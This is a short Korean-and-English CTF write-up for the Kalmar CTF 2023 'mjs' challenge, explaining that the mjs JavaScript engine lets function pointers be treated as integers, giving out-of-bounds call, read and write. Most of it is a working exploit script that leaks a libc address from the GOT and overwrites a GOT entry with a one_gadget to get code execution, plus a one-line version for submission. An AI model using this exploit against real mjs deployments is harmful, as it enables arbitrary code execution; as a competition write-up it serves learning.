[CTF write up] Kalmar CTF 2023 - mjs : Baby Open-Source Exploiting
2023. 3. 6. 02:15ㆍCTF write up
GitHub - mde/ejs: Embedded JavaScript templates -- http://ejs.co
Embedded JavaScript templates -- http://ejs.co. Contribute to mde/ejs development by creating an account on GitHub.
github.com
무려 함수를 raw pointer로 저장해서 정수랑 연산할 수 있는 엄청난 Vulneranilty(?) or Feature(?)가 존재한다. 패치도 안된 것으로 보인다(?)
There is a huge Vulnerability(?) or Feature(?) that can store a function as a raw pointer and operate with an integer. It looks like it's not even patched (?)
f = print;
f = f + 0x100;
f(); -> call (mjs_print+0x100)이런식으로 OOB가 가능하다.
In this way, OOB is possible.
let f = print;
let libc_start_main = f[0x26960];
for(let i = 1; i < 6; i++){
libc_start_main = libc_start_main + (f[0x26960+i] << 8*i);
}
let system = libc_start_main - 0x29dc0+0xebcf5;
for(let i = 0; i < 6; i++){
f[0x269c0+i] = (system >> 8*i) & 0xff;
}
print('')OOB call 뿐만 아니라 OOB read / write도 가능해서 이렇게 got를 one_gadget으로 덮어버리면 풀 수 있다.
OOB call as well as OOB read / write is possible, so you can solve it by overwriting got with one_gadget.
let f = print; let libc_start_main = f[0x26960]; for(let i = 1; i < 6; i++){ libc_start_main = libc_start_main + (f[0x26960+i] << 8*i); } let system = libc_start_main - 0x29dc0+0xebcf5; for(let i = 0; i < 6; i++){ f[0x269c0+i] = (system >> 8*i) & 0xff; } print('')한줄로 보내야한다.
should be sent in one line.
